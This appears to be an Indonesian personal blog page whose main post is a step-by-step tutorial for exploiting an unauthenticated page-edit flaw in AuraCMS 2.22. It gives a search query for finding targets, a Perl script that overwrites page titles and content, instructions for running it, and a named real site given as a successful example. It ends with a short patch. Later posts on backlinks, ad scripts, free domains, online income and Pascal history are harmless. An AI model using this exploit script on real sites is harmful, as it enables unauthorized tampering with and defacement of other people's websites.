Coretan Teatzo

wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ).

ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )

CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<

Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U

Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan )

- ketik di google Powered By AuraCMS 2.22

- buka file pages_data.php nya, caranya ketik di address bar seperti ini :

http//www.target.com/js/pages/pages_data.php

ganti yang warna merah sesuai target yang didapat

- bila sitenya sudah di patch akan keluar kata-kata berikut

You Must Login First If Not Yet Have Account Please Register

- bila belum, biasanya kosong dan ada tulisan

{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}

Kira-kira seperti itu,

- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE

berikut contoh script perl yang dibutuhkan :

use LWP:serAgent;
use HTTP:ookies;
use Getopt:ong;

my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP:ookies->new();
my $hasil = “”;
my $browser = LWP:serAgent->new;

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;

$hasil = $browser->get($arbitrary);

$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. .

berikut sedikit penjelasannya :

my $isijudul = “ISI JUDUL”;    >> ganti dengan judul yang sahabat inginkan

my $isikonten = “Isi Konten”; >>  Ganti dengan konten yang sahabat inginkan juga,

my $ambilkue = “http://situstarget.com/index.php”; >>   Ganti http://situstarget.com dengan situs asli target sahabat tadi.

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;      >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.

- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya.  >> contoh :    C:aura.pl

- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut.

- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ),  misal ada di dir C, ketik aza   >>  cd C:

- jalankan file aura.pl tadi. caranya ketik >>   C:aura.pl

- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya )

Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.

huff… setelah googling cukup lama, akhirnya dapat juga…

if(!cek_login()){

echo “Maaf anda tidak diperkenankan mengakses halaman ini”;

}else{

if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){

copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah

Thanks, Teatzo

Hehe, kabar bagus buat sahabat blogger nih.. Sesuai judul yang saya posting diatas, blog ini sekarang sudah menjadi dofollow. hehe,
Lo, kabar bagus gimana toh ?, emang apa sih dofollow itu?

Dofollow itu kebalikan dari Nofollow… ^^

Do          : melakukan
Follow  : Ikut, mengikuti

weiits.. bang Teatzo, masih belum paham nih …T.T
hehe, tenang sahabat, itu cuma penjelasan secara kasarnya kok.

Ok, tau istilah backlink kan ?
ya, Backlink, merupakan suatu hal yang sangat penting dalam meningkatkan PageRank suatu blog/web di mesin pencari, misalnya Google. Karena salah satu cara mendapatkan backlink secara gratis adalah dengan mengisi komentar di banyak blog sehingga kita dapat memasukkan link alamat blog/website kita untuk mendapatkan backlink. Namun jika blog yang kita komentari memberlakukan aturan NoFollow maka link yang kita masukkan tadi tidak dianggap sebagai backlink.

Nah, sedangkan Status Do Follow pada komentar sebuah blog berarti blog itu akan menempatkan alamat URL yang memberi komentar sebagai backlink, jadi dalam kasus ini, Blog dengan Status Dofollow-lah banyak dicari oleh para blogger, untuk membuat backlink secara gratis di situs/blog lain dengan cara memberikan komentar terhadap artikel/tulisan yang ada pada web/blog tersebut.

Hehe.. sudah paham kan, apa itu Dofollow, so, berhubung saya Baik hati dan tidak rakus ( ceiillee ) maka saya membuat blog saya menjadi “Dofollow” agar para sahabat blogger dapat linkback gratis hanya dengan mengirimkan komentarnya.. ^^

xixixixi… ayo buruan, kutunggu commentsnya loh !!

Untuk cara membuat blog menjaddi dofollow, baca artikel dari saya selanjutnya

Bingung, kenapa kok loading page blog saya jadi agak lama akhir- akhir ini, setelah kuperiksa, ternyata ada script yang berat, yaitu script dari AdsenseCamp. sebetulnya kejadian lambatnya server dari adsenseCamp sudah ada sejak Januari lalu,

berikut keterangan resmi dari pihak adsenseCamp :

Server AdsenseCamp Lambat

Dalam seminggu ke belakang kami mendapatkan banyak keluhan mengenai lambatnya pengaksesan blog yang menggunakan script AdsenseCamp. Hal tersebut memang kami yakini benar adanya dikarenakan adanya permasalahan pada server adsensecamp.com.

Setelah melakukan beberapa perbaikan, akhirnya hari ini server AdsenseCamp sudah berjalan normal kembali. Harapan kami kini tidak ada lagi kelambatan maupun error pada iklan adsensecamp.

Kami mohon maaf apabila akibat lambatnya pengaksesan pada website/blog Anda sampai mengganggu kenyamanan Anda. Semoga tidak ada masalah yang berarti kembali. Kami ucapkan terima kasih atas saran dan kritik yang masuk ke email kami.

Informasi | AdCamp | Jan 16

OK, selama ini yang domain gratis yang kita tahu adalah co.cc, co.nr, atau sebagainnya.

Kebayang ga, misal kita punya domain .com , .org, atau bahkan .namakamu, secara gratis… hehe

setelah sekian lama mencari di rumah om saya Google, dan juga dari temen temen (meskipun sempet kena tipu juga).. akhirnya nemu juga beberapa domain manager gratisan

Example : http://teatzo-system.org/

Baca Selengkapnya

BBM naik, semua harga kebutuhan semakin naik.
Otomatis, kita harus pintar-pintar dalam menghadapi situasi ini. Bagaimana agar dalam keadaan yang sulit ini kita bisa terus makan dengan enak dan tidur dengan tenang.
Bekerja segiat mungkin ?? Sudah jelas harus…
Tapi kalau penghasilan yang kita miliki masih kurang mencukupi, apa yang harus kita lakukan ??

Ada banyak cara untuk mendapatkan uang tambahan, salah satunya melalui internet.
Berikut beberapa alternatif yang bisa dipilih untuk menambah penghasilan anda dari internet.

• Melalui program-program afiliasi..
  Dengan mendaftar pada program-program afiliasi, maka kita mendapat kesempatan untuk mendapat keuntungan dari setiap penjualan produk afiliasi.
  Bukan cuma itu, beberapa situs afiliasi mengijinkan kita mendapat komisi dari setiap member baru yang mendaftar dari link afiliasi kita.

• Melalui PTC atau PPC..
  kalau untuk yang PPC, anda harus mempunyai minimal sebuah sarana situs sebagai tempat menaruh iklan yang nantinya akan diklik oleh pengunjung. Dan penghasilan anda keluar dari klik tersebut.
  Kalau untuk PTC, maka anda cukup meluangkan waktu untuk meng-klik iklan-iklan yang keluar dan kemudian anda dibayar untuk itu.
  Salah satu program PTC yang terkenal adalah Clixsense(ref). Dimana nilai per-kliknya cukup tinggi bila dibandingkan dengan program PTC lain.

• Melalui jualan online di Internet..
  Kalau yang ini, maka minimal anda juga harus mempunyai sebuah situs. Dan sangat disarankan untuk memiliki situs yang owned-hosting.
  Berjualan online di internet hampir sama dengan jualan di dunia nyata, cuma bedanya di internet kita tidak dapat langsung berhadapan dengan pengunjung. Jadi, sangat dianjurkan untuk berhati-hati dalam setiap transaksi yang ada.
• Melalui donasi orang..
  Ini adalah cara paling nyeleneh. Mengharapkan donasi dari orang-orang. Semacam mengemis ??
  Mungkin. Tetapi ini di dunia internet. Dimana, bagi orang luar negeri, jumlah uang $1 itu tidak ada artinya. Bayangkan, bila situs anda memiliki kunjungan trafik yang lumayan (anggap 500 orang / hari) dan itu adalah trafik luar.
  Dan bila anda pandai menulis artikel, buatlah sebuah artikel yang sangat menarik. Ingat, orang bule kebanyakan dari mereka adalah orang yang apresiatif. Apabila mereka merasa puas dengan situs anda, maka mereka tak akan ragu-ragu dalam mendonasikan uang mereka.
  Bila dari 500 pengunjung itu ada sekitar 20 orang saja yang mendonasikan $1 setiap hari. Bayangkan berapa penghasilan anda sebulan ??
  Ingat, cara ini tidak serta-merta cuma mengharapkan donasi. Tetapi juga harus disertai dengan kemampuan menulis artikel yang bagus. Jadi donasi orang tersebut dialokasikan untuk kemampuan anda dalam menulis artikel.

Masih banyak cara mendapat uang tambahan dari internet.
Mungkin, akan coba saya bahas lagi di sesi-sesi berikutnya.
Kalau ada yang punya pengalaman tambahan, mungkin bisa disharingkan..

Thanks, Teatzo

Sumber : Cangkuran.com

Pascal adalah bahasa tingkat tinggi (high level language) yang orientasinya pada segala tujuan, dirancang oleh Profesor Niklaus Wirth dari Technical University of Zurich, Switzerland. Nama Pascal diambil sebagai penghargaan terhadap Blaise Pascal, ahli matematik dan filosofer terkenal abad 17 dari Perancis.

Profesor Niklaus Wirth memperkenalkan kompiler bahasa Pascal pertama kali untuk komputer CDC 6000 (Control Data Corporation) yang dipublikasikan pada tahun 1971 dengan tujuan membantu mengajar program komputer secara sistematis, khususnya untuk memperkenalkan pemrograman terstruktur.

Dalam waktu singkat, Pascal telah menjadi bahasa yang populer di kalangan pelajar universitas dan merupakan bahasa yang diajarkan di beberapa perguruan tinggi. Beberapa profesional komputer juga mulai beralih ke bahasa Pascal. Kenyataannya, Pascal merupakan bahasa yang paling cepat populer dibandingkan dengan bahasa-bahasa komputer tingkat tinggi yang lainnya.

Standar Pascal adalah bahasa Pascal yang didefinisikan oleh K.Jensen dan Niklaus Wirth. Penerapan nyata dari standar Pascal banyak yang berbeda dengan seperti apa yang telah didefinisikan oleh K. Jensen dan Niklaus Wirth. Standar Pascal di Eropa didefinisiakn oelh ISO (International Standards Organization) dan di Amerika oleh kerjasama antara ANSI (American National Standar Institute) dengan IEEE (Intitute of Electrical and Electronic Engineer).

Beberapa versi dari Pascal yang telah beredar di pasaran, di antaranya UCSD pascal (University of California at San Diego Pascal), MS-Pascal (Microsoft Pascal), Apple Pascal, Turbo Pascal dan lain sebagainya. Sampai saat ini untuk komputer-komputer mikro dan personal, Turbo Pascal merupakan versi bahasa Pascal yang paling populer dan banyak digunakan. Kompiler Turbo Pascal banyak digemari, karena terutama bersifat interaktif, seperti interpreter saja layaknya. Selain itu Turbo Pascal mengikuti definisi dari standar Pascal seperti yang didefinisikan oleh K. Jensen dan Niklaus Wirth di Pascal User Manual dan Report. Turbo PASCAL adalah copyright dari Borland Inc. dan dapat digunakan pada sistem operasi PC-DOS, MS-DOS, CPM-86 dan CP/M-80. Berikut yang penulis pakai adalah Turbo Pascal versi 7.0.

sumber : Yogyafree

mm.. untuk mempraktekannya bisa menggunakan Free Pascal (FPC)